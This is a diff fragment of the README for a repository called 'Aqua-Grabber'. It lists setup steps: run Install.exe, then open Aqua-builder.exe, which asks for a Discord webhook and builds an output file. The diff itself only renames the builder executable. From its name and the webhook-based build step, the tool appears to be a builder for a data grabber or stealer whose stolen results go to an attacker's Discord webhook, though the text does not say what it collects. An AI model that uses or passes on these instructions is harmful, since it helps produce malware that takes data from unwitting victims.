NotAquaDev/Aqua-Grabber/README.md

 2. Use the key: to have acces
 3. Extract the file called "Main"
 4. Open Install.exe
-5. If everything installed succesfully, open builder.exe
+5. If everything installed succesfully, open Aqua-builder.exe
 6. It will ask for your Discord webhook, so have one ready.
 7. After you put in the Webhook it will build it and open a map in explorer where your file is ready